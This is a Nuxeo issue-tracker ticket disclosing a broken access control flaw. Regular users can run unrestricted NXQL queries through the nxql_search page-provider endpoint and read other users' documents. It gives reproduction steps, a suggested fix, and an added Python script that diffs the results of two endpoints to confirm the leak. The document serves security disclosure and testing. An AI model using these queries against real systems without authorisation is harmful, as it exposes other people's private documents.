Nuxeo Platform: NXP-32586

#PT22227_1 Broken Access Control Executing NXQL Queries as Regular User


    Details

    • Type: Bug
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security

      Description

      Tested URL : https://pentest-2023.beta.nuxeocloud.com/nuxeo/api/v1/search/pp/nxql_search/execute?currentPageIndex=:pageIndex&offset=:offset&pageSize=:pageSize&queryParams=:query

      Severity : medium

      Criticality Justification
      A regular user can execute NXQL searches without restrictions, thus accessing documents that do not belong to him.

      Steps To Reproduce
      Step 1: Login with a regular user to the application (user-pentest-1 or user-pentest-2)
      Step 2: Execute a GET request to the endpoint /nuxeo/api/v1/search/pp/nxql_search/execute with the user's session including the following parameters currentPageIndex=0&pageSize=20&queryParams=SELECT%20*%20FROM%20Document (https://api.us.cobalt.io/v1/attachments/att_Wr01QgY/preview)
      The user will be able to access document details from other users, such as nco-admin or pentest-admin, which are not available in regular queries on the endpoint /nuxeo/api/v1/search/execute, the one regular users use.

      Suggested Fix
      Perform an access check before returning or processing the information in the /nuxeo/api/v1/search/pp/nxql_search/execute endpoint, which should be available to Admins only. If the user does not have access to that resource, simply reject the request.

      Prerequisites
      Authenticated user required
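
      The following is an added example for checking the behaviour described in the steps above; it is not code from the report or from Nuxeo. It builds the two request URLs (the page-provider endpoint from the report and the regular search endpoint) for the same NXQL and diffs the document uids the two responses return for one user: anything returned only by nxql_search, especially with a different dc:creator, is a candidate for the access-control gap. The `query` parameter name for the regular endpoint and the `entries[].uid` / `properties["dc:creator"]` response fields are assumptions about the Nuxeo search API, and the sample responses are constructed.

```python
"""Diff what one user sees through the nxql_search page provider versus the
regular search endpoint.

Added example, not Nuxeo's or the reporter's code. Assumptions: the regular
endpoint takes the NXQL in a `query` parameter, and search responses carry
`entries[].uid` and `entries[].properties["dc:creator"]`. The sample
responses below are constructed.
"""
import json
from urllib.parse import urlencode, urljoin

BASE = "https://pentest-2023.beta.nuxeocloud.com/nuxeo/"  # host from the report
NXQL = "SELECT * FROM Document"                            # query from step 2


def pp_url(base=BASE, nxql=NXQL, page_index=0, page_size=20):
    """URL for the page-provider endpoint named in the report (queryParams carries raw NXQL)."""
    qs = urlencode({"currentPageIndex": page_index, "pageSize": page_size, "queryParams": nxql})
    return urljoin(base, "api/v1/search/pp/nxql_search/execute") + "?" + qs


def search_url(base=BASE, nxql=NXQL, page_index=0, page_size=20):
    """URL for the regular search endpoint; the `query` parameter name is an assumption."""
    qs = urlencode({"query": nxql, "currentPageIndex": page_index, "pageSize": page_size})
    return urljoin(base, "api/v1/search/execute") + "?" + qs


def entries_by_uid(body):
    """Index a Nuxeo 'documents' response by document uid."""
    data = json.loads(body) if isinstance(body, (str, bytes)) else body
    return {e["uid"]: e for e in data.get("entries", [])}


def leaked_documents(pp_body, search_body, user):
    """Documents the page provider returns that the regular endpoint does not.

    Each hit records the creator so that documents owned by another account
    (the report names nco-admin and pentest-admin) stand out. A hit created
    by `user` is still listed: it was hidden from the regular endpoint for
    some other reason that is worth looking at.
    """
    pp = entries_by_uid(pp_body)
    regular = entries_by_uid(search_body)
    hits = []
    for uid, doc in pp.items():
        if uid in regular:
            continue
        creator = doc.get("properties", {}).get("dc:creator")
        hits.append({"uid": uid, "path": doc.get("path"),
                     "creator": creator, "other_owner": creator != user})
    return hits


# Constructed sample responses in the shape of Nuxeo's search API: the regular
# endpoint shows only the user's own document, the page provider additionally
# exposes a document created by pentest-admin.
SEARCH_RESPONSE = json.dumps({
    "entity-type": "documents", "resultsCount": 1,
    "entries": [
        {"entity-type": "document", "uid": "1111-user",
         "path": "/default-domain/workspaces/user-pentest-1/notes",
         "title": "notes", "properties": {"dc:creator": "user-pentest-1"}},
    ],
})
PP_RESPONSE = json.dumps({
    "entity-type": "documents", "resultsCount": 2,
    "entries": [
        {"entity-type": "document", "uid": "1111-user",
         "path": "/default-domain/workspaces/user-pentest-1/notes",
         "title": "notes", "properties": {"dc:creator": "user-pentest-1"}},
        {"entity-type": "document", "uid": "2222-admin",
         "path": "/default-domain/workspaces/pentest-admin/secret",
         "title": "secret", "properties": {"dc:creator": "pentest-admin"}},
    ],
})


if __name__ == "__main__":
    print("GET", pp_url())
    print("GET", search_url())
    for hit in leaked_documents(PP_RESPONSE, SEARCH_RESPONSE, "user-pentest-1"):
        print("visible only via nxql_search:", hit)
```

      In a live check, issue both GETs with the same regular user's session cookie from step 1 and pass the two response bodies to `leaked_documents`; an empty list for the same NXQL on both endpoints is the expected result once the fix is in place.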

    People

    • Assignee: Unassigned
    • Reporter: santony Sooraj Antony